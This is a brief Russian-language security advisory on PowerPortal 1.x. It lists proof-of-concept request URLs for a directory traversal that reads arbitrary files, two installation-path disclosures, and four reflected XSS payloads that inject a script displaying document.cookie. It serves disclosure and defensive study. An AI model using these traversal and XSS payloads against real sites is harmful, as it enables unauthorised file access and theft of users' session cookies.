Несколько уязвимостей в PowerPortal

Рекомендуем почитать:

Хакер #306. OAuth от и до

• Содержание выпуска
• Подписка на «Хакер»-60%

Программа: PowerPortal 1.х 

Уязвимость в PowerPortal позволяет удаленному пользователю просматривать произвольные файлы на системе, выполнять XSS нападение и определить инсталляционный путь. 

1. Просмотр файлов: 

http://[target]/modules.php?name= gallery&files=/../../../

2. Раскрытие пути: 

http://[target]/modules/gallery/ resize.php
http://[target]/power/modules.php? name=gallery&files=darkbicho

3. XSS: 

http://[target]/modules.php?name =private_messages&file=reply&id='> <script>alert(document.cookie);</script>
http://[target]/modules.php?name =links&search=<script>alert(document.cookie);
</script>&func=se arch_results
http://[target]/modules.php?name =content&file=search&search=<script>alert(document.
cookie);</script>&func=results
http://[target]/modules.php?name =gallery&files=<script>alert(document.cookie);
</script>